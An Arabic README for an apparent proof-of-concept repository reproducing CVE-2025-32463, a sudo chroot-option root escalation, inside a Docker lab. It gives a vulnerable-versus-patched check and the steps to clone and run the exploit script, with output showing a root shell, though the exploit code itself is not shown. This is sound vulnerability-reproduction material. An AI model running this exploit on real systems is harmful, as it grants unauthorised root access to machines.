
تصعيد الامتيازات إلى root عبر ثنائي sudo مع خيار chroot. CVE-2025-32463
يوفر هذا المستودع بيئة بسيطة وقابلة لإعادة الإنتاج لإظهار ثغرة تصعيد الامتيازات CVE‑2025‑32463 في ميزة chroot الخاصة بـ sudo.
النسخ القابلة للاستغلال من sudo 1.9.14 حتى 1.9.17 (جميع مراجعات p‑) في معظم توزيعات Linux متأثرة.
صفحات الأمان
| الملف | الغرض |
|---|---|
| Dockerfile | ينشئ صورة Ubuntu 24.04 مع sudo 1.9.16p2 القابل للاستغلال وأدوات البناء |
| sudo‑chwoot.sh | استغلال إثبات المفهوم يفتح قشرة root داخل chroot |
| run.sh | سكربت مساعد يبني الصورة (عند الحاجة) ويشغّل حاوية الاستغلال |
# Vulnerable sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# Patched sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot
# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh
# 3 – run exploit in container (runs root command directly or drops you into a root shell)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#
يمرر run.sh الخيارين --privileged و--rm إلى Docker بحيث تُنظّف الحاوية نفسها عند خروجك.
احذف الصورة عندما تنتهي:
docker rmi sudo-chwoot